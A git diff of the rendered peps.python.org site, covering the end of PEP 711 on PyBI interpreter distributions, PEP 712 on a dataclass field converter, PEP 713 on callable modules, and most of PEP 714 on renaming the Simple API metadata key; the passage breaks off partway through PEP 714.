    So actually using Pybi-Wheel-Tag values is less trivial than it +might seem, and they’re probably only useful with fairly +sophisticated tooling. But, smart pybi installers will already have +to understand a lot of these platform compatibility issues in order +to select a working pybi, and for the cross-platform +pinning/environment building case, users can potentially provide +whatever information is needed to disambiguate exactly what platform +they’re targeting. So, it’s still useful enough to include in the PyBI +metadata – tools that don’t find it useful can simply ignore it.

    +
  • +
+

You can probably generate these metadata values by running this script on the +built interpreter:

+
import packaging.markers
+import packaging.tags
+import sysconfig
+import os.path
+import json
+import sys
+
+marker_vars = packaging.markers.default_environment()
+# Delete any keys that depend on the final installation
+del marker_vars["platform_release"]
+del marker_vars["platform_version"]
+# Darwin binaries are often multi-arch, so play it safe and
+# delete the architecture marker. (Better would be to only
+# do this if the pybi actually is multi-arch.)
+if marker_vars["sys_platform"] == "darwin":
+    del marker_vars["platform_machine"]
+
+# Copied and tweaked version of packaging.tags.sys_tags
+tags = []
+interp_name = packaging.tags.interpreter_name()
+if interp_name == "cp":
+    tags += list(packaging.tags.cpython_tags(platforms=["xyzzy"]))
+else:
+    tags += list(packaging.tags.generic_tags(platforms=["xyzzy"]))
+
+tags += list(packaging.tags.compatible_tags(platforms=["xyzzy"]))
+
+# Gross hack: packaging.tags normalizes platforms by lowercasing them,
+# so we generate the tags with a unique string and then replace it
+# with our special uppercase placeholder.
+str_tags = [str(t).replace("xyzzy", "PLATFORM") for t in tags]
+
+(base_path,) = sysconfig.get_config_vars("installed_base")
+# For some reason, macOS framework builds report their
+# installed_base as a directory deep inside the framework.
+while "Python.framework" in base_path:
+    base_path = os.path.dirname(base_path)
+paths = {key: os.path.relpath(path, base_path).replace("\\", "/") for (key, path) in sysconfig.get_paths().items()}
+
+json.dump({"marker_vars": marker_vars, "tags": str_tags, "paths": paths}, sys.stdout)
+
+
+

This emits a JSON dict on stdout with separate entries for each set of +pybi-specific tags.

+
+
+ +
+
+

Non-normative comments

+
+

Why not just use conda?

+

This isn’t really in the scope of this PEP, but since conda is a popular way to +distribute binary Python interpreters, it’s a natural question.

+

The simple answer is: conda is great! But, there are lots of python users who +aren’t conda users, and they deserve nice things too. This PEP just gives them +another option.

+

The deeper answer is: the maintainers who upload packages to PyPI are the backbone of the Python ecosystem. They’re the first audience for Python packaging tools. And one thing they want is to upload a package once, and have it be accessible across all the different ways Python is deployed: in Debian and Fedora and Homebrew and FreeBSD, in Conda environments, in big companies’ monorepos, in Nix, in Blender plugins, in RenPy games… you get the idea.

+

All of these environments have their own tooling and strategies for managing +packages and dependencies. So what’s special about PyPI and wheels is that +they’re designed to describe dependencies in a standard, abstract way, that +all these downstream systems can consume and convert into their local +conventions. That’s why package maintainers use Python-specific metadata and +upload to PyPI: because it lets them address all of those systems +simultaneously. Every time you build a Python package for conda, there’s an +intermediate wheel that’s generated, because wheels are the common language that +Python package build systems and conda can use to talk to each other.

+

But then, if you’re a maintainer releasing an sdist+wheels, then you naturally +want to test what you’re releasing, which may depend on arbitrary PyPI packages +and versions. So you need tools that build Python environments directly from +PyPI, and conda is fundamentally not designed to do that. So conda and pip are +both necessary for different cases, and this proposal happens to be targeting +the pip side of that equation.

+
+
+

Sdists (or not)

+

It might be cool to have an “sdist” equivalent for pybis, i.e., some +kind of format for a Python source release that’s structured-enough to +let tools automatically fetch and build it into a pybi, for platforms +where prebuilt pybis aren’t available. But, this isn’t necessary for the +MVP and opens a can of worms, so let’s worry about it later.

+
+
+

What packages should be bundled inside a pybi?

+

Pybi builders have the power to pick and choose what exactly goes inside. For example, you could include some preinstalled packages in the pybi’s site-packages directory, or prune out bits of the stdlib that you don’t want. We can’t stop you! Though if you do preinstall packages, then it’s strongly recommended to also include the correct metadata (.dist-info etc.), so that it’s possible for Pip or other tools to understand what’s going on.

+

For my prototype “general purpose” pybis, what I chose is:

+
    +
  • Make sure site-packages is empty.

    Rationale: for traditional standalone python installers that are targeted +at end-users, you probably want to include at least pip, to avoid +bootstrapping issues (PEP 453). But pybis are different: they’re designed +to be installed by “smart” tooling, that consume the pybi as part of some +kind of larger automated deployment process. It’s easier for these installers +to start from a blank slate and then add whatever they need, than for them to +start with some preinstalled packages that they may or may not want. (And +besides, you can still run python -m ensurepip.)

    +
  • +
  • Include the full stdlib, except for test.

    Rationale: the top-level test module contains CPython’s own test +suite. It’s huge (CPython without test is ~37 MB, then test +adds another ~25 MB on top of that!), and essentially never used by +regular user code. Also, as precedent, the official nuget packages, +the official manylinux images, and multiple Linux distributions all +leave it out, and this hasn’t caused any major problems.

    +

    So this seems like the best way to balance broad compatibility with +reasonable download/install sizes.

    +
  • +
  • I’m not shipping any .pyc files. They take up space in the +download, can be generated on the final system at minimal cost, and +dropping them removes a source of location-dependence. (.pyc +files store the absolute path of the corresponding .py file and +include it in tracebacks; but, pybis are relocatable, so the correct +path isn’t known until after install.)
  • +
+
+
+
+

Backwards Compatibility

+

No backwards compatibility considerations.

+
+
+

Security Implications

+

No security implications, beyond the fact that anyone who takes it upon +themselves to distribute binaries has to come up with a plan to manage their +security (e.g., whether they roll a new build after an OpenSSL CVE drops). But +collectively, we core Python folks are already maintaining binary builds for all +major platforms (macOS + Windows through python.org, and Linux builds through +the official manylinux image), so even if we do start releasing official CPython +builds on PyPI it doesn’t really raise any new security issues.

+
+
+

How to Teach This

+

This isn’t targeted at end-users; their experience will simply be that e.g. +their pyenv or tox invocation magically gets faster and more reliable (if those +projects’ maintainers decide to take advantage of this PEP).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0711.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0712/index.html b/pep-0712/index.html new file mode 100644 index 00000000000..48313bb6610 --- /dev/null +++ b/pep-0712/index.html @@ -0,0 +1,476 @@ + + + + + + + + PEP 712 – Adding a “converter” parameter to dataclasses.field | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 712 – Adding a “converter” parameter to dataclasses.field

+
+
Author:
+
Joshua Cannon <joshdcannon at gmail.com>
+
Sponsor:
+
Eric V. Smith <eric at trueblade.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Jan-2023
+
Python-Version:
+
3.13
+
Post-History:
+
27-Dec-2022, +19-Jan-2023, +23-Apr-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The reasons for the 2024 Steering Council rejection include:

+
    +
  • We did not find evidence of a strong consensus that this feature was needed in the standard library, despite some proponents arguing in favor in order to reduce their dependence on third party packages. For those who need such functionality, we think those existing third party libraries such as attrs and Pydantic (which the PEP references) are acceptable alternatives.
  • +
  • This feature seems to us like an accumulation of what could be considered more cruft in the standard library, leading us ever farther away from the “simple” use cases that dataclasses are ideal for.
  • +
  • Reading the “How to Teach This” section of the PEP gives us pause that the pitfalls and gotchas are significant, with a heightened confusion and complexity outweighing any potential benefits.
  • +
  • The PEP seems more focused toward helping type checkers than people using the library.
  • +
+
+
+

Abstract

+

PEP 557 added dataclasses to the Python stdlib. PEP 681 added +dataclass_transform() to help type checkers understand +several common dataclass-like libraries, such as attrs, Pydantic, and object +relational mapper (ORM) packages such as SQLAlchemy and Django.

+

A common feature other libraries provide over the standard library +implementation is the ability for the library to convert arguments given at +initialization time into the types expected for each field using a +user-provided conversion function.

+

Therefore, this PEP adds a converter parameter to dataclasses.field() +(along with the requisite changes to dataclasses.Field and +dataclass_transform()) to specify the function to use to +convert the input value for each field to the representation to be stored in +the dataclass.

+
+
+

Motivation

+

There is no existing, standard way for dataclasses or third-party +dataclass-like libraries to support argument conversion in a type-checkable +way. To work around this limitation, library authors/users are forced to choose +to:

+
    +
  • Opt-in to a custom Mypy plugin. These plugins help Mypy understand the +conversion semantics, but not other tools.
  • +
  • Shift conversion responsibility onto the caller of the dataclass +constructor. This can make constructing certain dataclasses unnecessarily +verbose and repetitive.
  • +
  • Provide a custom __init__ which declares “wider” parameter types and +converts them when setting the appropriate attribute. This not only duplicates +the typing annotations between the converter and __init__, but also opts +the user out of many of the features dataclasses provides.
  • +
  • Provide a custom __init__ but without meaningful type annotations +for the parameter types requiring conversion.
  • +
+

None of these choices are ideal.

+
+
+

Rationale

+

Adding argument conversion semantics is useful and beneficial enough that most +dataclass-like libraries provide support. Adding this feature to the standard +library means more users are able to opt-in to these benefits without requiring +third-party libraries. Additionally third-party libraries are able to clue +type-checkers into their own conversion semantics through added support in +dataclass_transform(), meaning users of those libraries +benefit as well.

+
+
+

Specification

+
+

New converter parameter

+

This specification introduces a new parameter named converter to the +dataclasses.field() function. If provided, it represents a single-argument +callable used to convert all values when assigning to the associated attribute.

+

For frozen dataclasses, the converter is only used inside a dataclass-synthesized __init__ when setting the attribute. For non-frozen dataclasses, the converter is used for all attribute assignment (e.g. obj.attr = value), which includes assignment of default values.

+

The converter is not used when reading attributes, as the attributes should already +have been converted.

+

Adding this parameter also implies the following changes:

+ +
+

Example

+
def str_or_none(x: Any) -> str | None:
+  return str(x) if x is not None else None
+
+@dataclasses.dataclass
+class InventoryItem:
+    # `converter` as a type (including a GenericAlias).
+    id: int = dataclasses.field(converter=int)
+    skus: tuple[int, ...] = dataclasses.field(converter=tuple[int, ...])
+    # `converter` as a callable.
+    vendor: str | None = dataclasses.field(converter=str_or_none)
+    names: tuple[str, ...] = dataclasses.field(
+      converter=lambda names: tuple(map(str.lower, names))
+    )  # Note that lambdas are supported, but discouraged as they are untyped.
+
+    # The default value is also converted; therefore the following is not a
+    # type error.
+    stock_image_path: pathlib.PurePosixPath = dataclasses.field(
+      converter=pathlib.PurePosixPath, default="assets/unknown.png"
+    )
+
+    # Default value conversion extends to `default_factory`;
+    # therefore the following is also not a type error.
+    shelves: tuple = dataclasses.field(
+      converter=tuple, default_factory=list
+    )
+
+item1 = InventoryItem(
+  "1",
+  [234, 765],
+  None,
+  ["PYTHON PLUSHIE", "FLUFFY SNAKE"]
+)
+# item1's repr would be (with added newlines for readability):
+#   InventoryItem(
+#     id=1,
+#     skus=(234, 765),
+#     vendor=None,
+#     names=('PYTHON PLUSHIE', 'FLUFFY SNAKE'),
+#     stock_image_path=PurePosixPath('assets/unknown.png'),
+#     shelves=()
+#   )
+
+# Attribute assignment also participates in conversion.
+item1.skus = [555]
+# item1's skus attribute is now (555,).
+
+
+
+
+
+

Impact on typing

+

A converter must be a callable that accepts a single positional argument, and the parameter type corresponding to this positional argument provides the type of the synthesized __init__ parameter associated with the field.

+

In other words, the argument provided for the converter parameter must be +compatible with Callable[[T], X] where T is the input type for +the converter and X is the output type of the converter.

+
+

Type-checking default and default_factory

+

Because default values are unconditionally converted using converter, if +an argument for converter is provided alongside either default or +default_factory, the type of the default (the default argument if +provided, otherwise the return value of default_factory) should be checked +using the type of the single argument to the converter callable.

+
+
+

Converter return type

+

The return type of the callable must be a type that’s compatible with the +field’s declared type. This includes the field’s type exactly, but can also be +a type that’s more specialized (such as a converter returning a list[int] +for a field annotated as list, or a converter returning an int for a +field annotated as int | str).
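+
Putting the two rules together, under the API this PEP proposes (a sketch; this converter parameter is not part of the standard library), the following would type-check:

+
import dataclasses
+
+@dataclasses.dataclass
+class Server:
+    # The converter returns int, which is narrower than (and therefore
+    # compatible with) the declared int | str field type.
+    key: int | str = dataclasses.field(converter=int)
+    # The str default is checked against the converter's input type rather
+    # than the field type, so this is accepted.
+    port: int = dataclasses.field(converter=int, default="8080")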

+
+
+
+

Indirection of allowable argument types

+

One downside introduced by this PEP is that knowing what argument types are +allowed in the dataclass’ __init__ and during attribute assignment is not +immediately obvious from reading the dataclass. The allowable types are defined +by the converter.

+

This is true when reading code from source; however, typing-related aids such as typing.reveal_type and “IntelliSense” in an IDE should make it easy to know exactly what types are allowed without having to read any source code.

+
+
+
+

Backward Compatibility

+

These changes don’t introduce any compatibility problems since they +only introduce opt-in new features.

+
+
+

Security Implications

+

There are no direct security concerns with these changes.

+
+
+

How to Teach This

+

Documentation and examples explaining the new parameter and behavior will be +added to the relevant sections of the docs site (primarily on +dataclasses) and linked from the What’s New document.

+

The added documentation/examples will also cover the “common pitfalls” that +users of converters are likely to encounter. Such pitfalls include:

+
    +
  • Needing to handle None/sentinel values.
  • +
  • Needing to handle values that are already of the correct type.
  • +
  • Avoiding lambdas for converters, as the synthesized __init__ +parameter’s type will become Any.
  • +
  • Forgetting to convert values in the bodies of user-defined __init__ in +frozen dataclasses.
  • +
  • Forgetting to convert values in the bodies of user-defined __setattr__ in +non-frozen dataclasses.
  • +
+

Additionally, potentially confusing pattern matching semantics should be covered:

+
@dataclass
+class Point:
+    x: int = field(converter=int)
+    y: int
+
+match Point(x="0", y=0):
+    case Point(x="0", y=0):  # Won't be matched
+        ...
+    case Point():  # Will be matched
+        ...
+    case _:
+        ...
+
+
+

However, it’s worth noting that this behavior is true of any type that does conversion in its initializer, and type-checkers should be able to catch this pitfall:

+
match int("0"):
+  case int("0"):  # Won't be matched
+      ...
+  case _:  # Will be matched
+      ...
+
+
+
+
+

Reference Implementation

+

The attrs library already includes a converter +parameter exhibiting the same converter semantics (converting in the +initializer and on attribute setting) when using the @define class +decorator.
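+
For comparison, a minimal attrs example exercising the same semantics (conversion in the initializer and on attribute assignment):

+
import attrs
+
+@attrs.define
+class Point:
+    x: int = attrs.field(converter=int)
+
+p = Point("1")  # converted by the synthesized __init__
+p.x = "2"       # converted on attribute assignment as well
+assert p.x == 2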

+

CPython support is implemented on a branch in the author’s fork.

+
+
+

Rejected Ideas

+
+

Just adding “converter” to typing.dataclass_transform’s field_specifiers

+

The idea of isolating this addition to +dataclass_transform() was briefly +discussed on Typing-SIG where it was suggested +to broaden this to dataclasses more generally.

+

Additionally, adding this to dataclasses ensures anyone can reap the +benefits without requiring additional libraries.

+
+
+

Not converting default values

+

There are pros and cons with both converting and not converting default values. +Leaving default values as-is allows type-checkers and dataclass authors to +expect that the type of the default matches the type of the field. However, +converting default values has three large advantages:

+
    +
  1. Consistency. Unconditionally converting all values that are assigned to the attribute involves fewer “special rules” that users must remember.
  2. Simpler defaults. Allowing the default value to have the same type as user-provided values means dataclass authors get the same conveniences as their callers.
  3. Compatibility with attrs. Attrs unconditionally uses the converter to convert default values.
+
+
+

Automatic conversion using the field’s type

+

One idea could be to allow the type of the field specified (e.g. str or +int) to be used as a converter for each argument provided. +Pydantic’s data conversion has semantics which +appear to be similar to this approach.

+

This works well for fairly simple types, but leads to ambiguity in expected +behavior for complex types such as generics. E.g. For tuple[int, ...] it is +ambiguous if the converter is supposed to simply convert an iterable to a tuple, +or if it is additionally supposed to convert each element type to int. Or +for int | None, which isn’t callable.

+
+
+

Deducing the attribute type from the return type of the converter

+

Another idea would be to allow the user to omit the attribute’s type annotation +if providing a field with a converter argument. Although this would +reduce the common repetition this PEP introduces (e.g. x: str = field(converter=str)), +it isn’t clear how to best support this while maintaining the current dataclass +semantics (namely, that the attribute order is preserved for things like the +synthesized __init__, or dataclasses.fields). This is because there isn’t +an easy way in Python (today) to get the annotation-only attributes interspersed +with un-annotated attributes in the order they were defined.

+

A sentinel annotation could be applied (e.g. x: FromConverter = ...), +however this breaks a fundamental assumption of type annotations.

+

Lastly, this is feasible if all fields (including those without a converter) +were assigned to dataclasses.field, which means the class’ own namespace +holds the order, however this trades repetition of type+converter with +repetition of field assignment. The end result is no gain or loss of repetition, +but with the added complexity of dataclasses semantics.

+

This PEP doesn’t suggest it can’t or shouldn’t be done. Just that it isn’t +included in this PEP.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0712.rst

+

Last modified: 2024-06-06 23:57:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0713/index.html b/pep-0713/index.html new file mode 100644 index 00000000000..395256927ca --- /dev/null +++ b/pep-0713/index.html @@ -0,0 +1,308 @@ + + + + + + + + PEP 713 – Callable Modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 713 – Callable Modules

+
+
Author:
+
Amethyst Reese <amethyst at n7.gg>
+
Sponsor:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Apr-2023
+
Python-Version:
+
3.12
+
Post-History:
+
23-Apr-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

The Steering Council didn’t feel that there was a compelling reason to +have this PEP, even though it clearly could be done from a consistency +point of view. +If this idea comes up again in the future, this is a useful prior +discussion to refer to.

+
+
+

Abstract

+

Modules are currently not directly callable. Classes can define a __call__ +method that makes instance objects callable, but defining a similarly named +function in the global module scope has no effect, and that function can +only be called by importing or referencing it directly as module.__call__. +PEP 562 added support for __getattr__() and __dir__() for modules, but +defining __getattr__ to return a value for __call__ still does not +make a module callable.

+

This PEP proposes support for making modules directly callable by defining +a __call__ object in the module’s global namespace, either as a standard +function, or an arbitrary callable object.

+
+
+

Motivation

+

Many modules have only a single primary interface to their functionality. +In many cases, that interface is a single callable object, where being able +to import and use the module directly as a callable provides a more “Pythonic” +interface for users:

+
# user.py
+
+import fancy
+
+@fancy
+def func(...):
+    ...
+
+
+

Currently, providing this style of interface requires modifying the module +object at runtime to make it callable.

+

This is commonly done by replacing the module object in sys.modules with +a callable alternative (such as a function or class instance):

+
# fancy.py
+
+def fancy(...):
+    ...
+
+sys.modules[__name__] = fancy
+
+
+

This has the effect of making the original module effectively unreachable +without further hooks from the author, even with from module import member. +It also results in a “module” object that is missing all of the special module +attributes, including __doc__, __package__, __path__, etc.

+

Alternatively, a module author can choose to override the module’s __class__ +property with a custom type that provides a callable interface:

+
# fancy.py
+
+def fancy(...):
+    ...
+
+class FancyModule(types.ModuleType):
+    def __call__(self, ...):
+        return fancy(...)
+
+sys.modules[__name__].__class__ = FancyModule
+
+
+

The downside of either approach is that it not only results in extra +boilerplate, but also results in type checker failures because they don’t +recognize that the module is callable at runtime:

+
$ mypy user.py
+user.py:3: error: Module not callable  [operator]
+Found 1 error in 1 file (checked 1 source file)
+
+
+
+
+

Specification

+

When a module object is called, and a __call__ object is found (either +as the result of a __getattr__ or __dict__ lookup), then that object +will be called with the given arguments.

+

If a __call__ object is not found, then a TypeError will be raised, +matching the existing behavior.

+

All of these examples would be considered valid, callable modules:

+
# hello.py
+
+def __call__(...):
+    pass
+
+
+
# hello.py
+
+class Hello:
+    pass
+
+__call__ = Hello
+
+
+
# hello.py
+
+def hello():
+    pass
+
+def __getattr__(name):
+    if name == "__call__":
+        return hello
+
+
+

The first two styles should generally be preferred, as it allows for easier +static analysis from tools like type checkers, though the third form would be +allowed in order to make the implementation more consistent.

+

The intent is to allow arbitrary callable objects to be assigned to the module’s __call__ property or returned by the module’s __getattr__ method, enabling module authors to pick the most suitable mechanism for making their module callable by users.
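+
For illustration, the proposed lookup can be approximated in current Python by generalizing the __class__ override shown in the Motivation. This sketch mirrors the semantics specified above and is not the proposed CPython implementation:

+
import sys
+import types
+
+class _CallableModule(types.ModuleType):
+    def __call__(self, *args, **kwargs):
+        # Look in the module's namespace first, then in its __getattr__ hook.
+        target = self.__dict__.get("__call__")
+        if target is None and "__getattr__" in self.__dict__:
+            target = self.__dict__["__getattr__"]("__call__")
+        if target is None:
+            raise TypeError(f"'{self.__name__}' module is not callable")
+        return target(*args, **kwargs)
+
+# Placed at the bottom of a module that wants to be callable:
+sys.modules[__name__].__class__ = _CallableModule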

+
+
+

Backwards Compatibility and Impact on Performance

+

This PEP is not expected to cause any backwards incompatibility. Any modules +that already contain a __call__ object will continue to function the same +as before, though with the additional ability to be called directly. It is +considered unlikely that modules with an existing __call__ object would +depend on the existing behavior of raising TypeError when called.

+

Performance implications of this PEP are minimal, as it defines a new interface. +Calling a module would trigger a lookup for the name __call__ on a module +object. Existing workarounds for creating callable modules already depend on +this behavior for generic objects, resulting in similar performance for these +callable modules.

+

Type checkers will likely need to be updated accordingly to treat modules with +a __call__ object as callable. This should be possible to support in type +checkers when checking code targeted at older Python versions that do not +support callable modules, with the expectation that these modules would also +include one of the workarounds mentioned earlier to make the module callable.

+
+
+

How to Teach This

+

The documentation for callable types will +include modules in the list, with a link to __call__(). +The Emulating callable objects documentation will include a section +covering callable modules, with example code, similar to the section for +customizing module attribute access.

+
+
+

Reference Implementation

+

The proposed implementation of callable modules is available in +CPython PR #103742.

+
+
+

Rejected Ideas

+

Given the introduction of __getattr__ and __dir__, and the proposal +to enable use of __call__, it was considered if it was worth allowing use +of all Special method names for modules, such as __or__ +and __iter__. While this would not be completely undesired, it increases +the potential for backward compatibility concerns, and these other special +methods are likely to provide less utility to library authors in comparison +to __call__.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0713.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0714/index.html b/pep-0714/index.html new file mode 100644 index 00000000000..067f1906c53 --- /dev/null +++ b/pep-0714/index.html @@ -0,0 +1,392 @@ + + + + + + + + PEP 714 – Rename dist-info-metadata in the Simple API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 714 – Rename dist-info-metadata in the Simple API

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
06-Jun-2023
+
Post-History:
+
06-Jun-2023
+
Resolution:
+
27-Jun-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP renames the metadata provided by PEP 658 in both HTML and JSON +formats of the Simple API and provides guidelines for both clients and servers +in how to handle the renaming.

+
+
+

Motivation

+

PEP 658 specified a mechanism to host the core metadata files from an +artifact available through the Simple API such that a client could fetch the +metadata and use it without having to download the entire artifact. Later +PEP 691 was written to add the ability to use JSON rather than HTML on the +Simple API, which included support for the PEP 658 metadata.

+

Unfortunately, PyPI did not support PEP 658 until just recently, and that support was released with a bug where the dist-info-metadata key from PEP 658 was incorrectly named data-dist-info-metadata in the JSON representation. However, when attempting to fix that bug, it was discovered that pip also had a bug, where any use of dist-info-metadata in the JSON representation would cause pip to hard fail with an exception.

+

The bug in pip has existed since at least v22.3, which means that it has +been released for approximately 8 months, long enough to have been pulled into +Python releases, downstream Linux releases, baked into containers, virtual +environments, etc.

+

This puts us in an awkward position of having a bug on PyPI that cannot be fixed +without breaking pip, due to a bug in pip, but that version of pip is old enough +to have been widely deployed. To make matters worse, a version of pip that is +broken in this way cannot install anything from PyPI once it fixes its bug, +including installing a new, fixed version of pip.

+
+
+

Rationale

+

There are 3 main options for a path forward for fixing these bugs:

+
    +
  1. Do not change the spec, fix the bug in pip, wait some amount of time, then fix the bug in PyPI, breaking anyone using an unfixed pip such that they cannot even install a new pip from PyPI.
  2. Do the same as (1), but special case PyPI so it does not emit the PEP 658 metadata for pip, even if it is available. This allows people to upgrade pip if they’re on a broken version, but nothing else.
  3. Change the spec to avoid the key that pip can’t handle currently, allowing PyPI to emit that key and a new version of pip to be released to take advantage of that key.
+

This PEP chooses (3), but goes a little further and also renames the key in the +HTML representation.

+

Typically we do not change specs because of bugs that only affect one particular +implementation, unless the spec itself is at fault, which isn’t the case here: +the spec is fine and these are just genuine bugs in pip and PyPI.

+

However, we choose to do this for 4 reasons:

+
    +
  1. Bugs that affect pip and PyPI together represent an outsized amount of impact compared to any other client or repository combination.
  2. The impact of being broken is that installs do not function, at all, rather than degrading gracefully in some way.
  3. The feature that is being blocked by these bugs is of large importance to the ability to quickly and efficiently resolve dependencies from PyPI with pip, and having to delay it for a long period of time while we wait for the broken versions of pip to fall out of use would be of detriment to the entire ecosystem.
  4. The downsides of changing the spec are fairly limited, given that we do not believe that support for this is widespread, so it affects only a limited number of projects.
+
+
+

Specification

+

 The keywords “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, “SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this document are to be interpreted as described in RFC 2119.

+
+

Servers

+

The PEP 658 metadata, when used in the HTML representation of the Simple API, +MUST be emitted using the attribute name data-core-metadata, with the +supported values remaining the same.

+

The PEP 658 metadata, when used in the PEP 691 JSON representation of the +Simple API, MUST be emitted using the key core-metadata, with the +supported values remaining the same.

+

 To support clients that used the previous key names, the HTML representation MAY also emit the data-dist-info-metadata attribute, and if it does so its value MUST match that of data-core-metadata.

+
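 For illustration, a file entry in the PEP 691 JSON representation might look as follows under the rules above. This is a hedged sketch: the field shapes follow PEP 691, but the filename, URL, and hash values are invented.
 
+
file_entry = {
+    "filename": "example-1.0-py3-none-any.whl",   # invented example values
+    "url": "https://files.example.org/example-1.0-py3-none-any.whl",
+    "hashes": {"sha256": "..."},
+    # The renamed key from this PEP; supported values are unchanged from PEP 658.
+    "core-metadata": {"sha256": "..."},
+}
+
+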
+
+

Clients

+

Clients consuming any of the HTML representations of the Simple API MUST +read the PEP 658 metadata from the key data-core-metadata if it is +present. They MAY optionally use the legacy data-dist-info-metadata if +it is present but data-core-metadata is not.

+

Clients consuming the JSON representation of the Simple API MUST read the +PEP 658 metadata from the key core-metadata if it is present. They +MAY optionally use the legacy dist-info-metadata key if it is present +but core-metadata is not.

+
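 A minimal sketch of the client-side fallback described above, for the JSON representation (the file dict shape follows PEP 691; the helper name is ours):
 
+
def pep658_metadata(file: dict):
+    # Prefer the renamed key; fall back to the legacy key only when the
+    # new key is absent, as this specification allows.
+    if "core-metadata" in file:
+        return file["core-metadata"]
+    return file.get("dist-info-metadata")
+
+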
+
+
+

Backwards Compatibility

+

There is a minor compatibility break in this PEP, in that clients that currently +correctly handle the existing metadata keys will not automatically understand +the newer metadata keys, but they should degrade gracefully, and simply act +as if the PEP 658 metadata does not exist.

+

Otherwise there should be no compatibility problems with this PEP.

+
+
+

Rejected Ideas

+
+

Leave the spec unchanged, and cope with fixing in PyPI and/or pip

+

We believe that the improvements brought by PEP 658 are very important to +improving the performance of resolving dependencies from PyPI, and would like to +be able to deploy it as quickly as we can.

+

 Unfortunately, the nature of these bugs is that we cannot deploy the fixes as-is without breaking widely deployed and used versions of pip. The breakages in this case would be bad enough that affected users would not even be able to directly upgrade their version of pip to fix it, but would have to manually fetch pip another way first (e.g. get-pip.py).

+

This is something that PyPI would be unwilling to do without some way to +mitigate those breakages for those users. Without some reasonable mitigation +strategy, we would have to wait until those versions of pip are no longer in use +on PyPI, which would likely be 5+ years from now.

+

There are a few possible mitigation strategies that we could use, but we’ve +rejected them as well.

+
+

Mitigation: Special Case pip

+

 The breakages are particularly bad in that they prevent users from even upgrading pip to get an unbroken version, so a command like pip install --upgrade pip would fail. We could mitigate this by having PyPI special case pip itself, so that the JSON endpoint never returns the PEP 658 metadata and the above still works.

+

This PEP rejects this idea because while the simple command that only upgrades +pip would work, if the user included anything else in that command to upgrade +then the command would go back to failing, which we consider to be still too +large of a breakage.

+

Additionally, while this bug happens to be getting exposed right now with PyPI, +it is really a bug that would happen with any PEP 691 repository that +correctly exposed the PEP 658 metadata. This would mean that every repository +would have to carry this special case for pip.

+
+
+

Mitigation: Have the server use User-Agent Detection

+

pip puts its version number into its User-Agent, which means that the server +could detect the version number and serve different responses based on that +version number so that we don’t serve the PEP 658 metadata to versions of pip +that are broken.

+

This PEP rejects this idea because supporting User-Agent detection is too +difficult to implement in a reasonable way.

+
    +
  1. On PyPI we rely heavily on caching the Simple API in our CDN. If we varied +the responses based on User-Agent, then our CDN cache would have an +explosion of cache keys for the same content, which would make it more likely +that any particular request would not be cached and fall back to hitting +our backend servers, which would have to scale much higher to support the +load.
  2. +
  3. PyPI could support the User-Agent detection idea by mutating the Accept header of the request so that those versions appear to only accept the HTML version, allowing us to maintain the CDN’s cache keys. This doesn’t affect any downstream caches of PyPI, though, including pip’s HTTP cache, which could have JSON responses cached for those requests; we wouldn’t emit a Vary: User-Agent header for them to know that it isn’t acceptable to share those caches, and adding one for downstream caches would have the same problem as (1), but for downstream caches instead of our CDN cache.
  4. +
  5. The pip bug ultimately isn’t PyPI specific, it affects any repository that +implements PEP 691 and PEP 658 together. This would mean that +workarounds that rely on implementation specific fixes have to be replicated +for each repository that implements both, which may not be easy or possible +in all cases (static mirrors may not be able to do this User-Agent +detection for instance).
  6. +
+
+
+
+

Only change the JSON key

+

The bug in pip only affects the JSON representation of the Simple API, so we only +need to actually change the key in the JSON, and we could leave the existing +HTML keys alone.

+

This PEP rejects doing that because we believe that in the long term, having +the HTML and JSON key names diverge would make mistakes like this more likely +and make implementing and understanding the spec more confusing.

+

The main reason that we would want to not change the HTML keys is to not lose +PEP 658 support in any HTML only clients or repositories that might already +support it. This PEP mitigates that breakage by allowing both clients and +servers to continue to support both keys, with a recommendation of when and +how to do that.

+
+
+
+

Recommendations

+

 The recommendations in this section, other than this notice itself, are non-normative, and represent what the PEP authors believe to be the best default implementation decisions for something implementing this PEP; they do not represent any sort of requirement to match these decisions.

+
+

Servers

+

We recommend that servers only emit the newer keys, particularly for the JSON +representation of the Simple API since the bug itself only affected JSON.

+

 Servers that wish to support PEP 658 in HTML-only clients that have already implemented it can safely emit both keys, but only in the HTML representation.

+

Servers should not emit the old keys in JSON unless they know that no broken +versions of pip will be used to access their server.

+
+
+

Clients

+

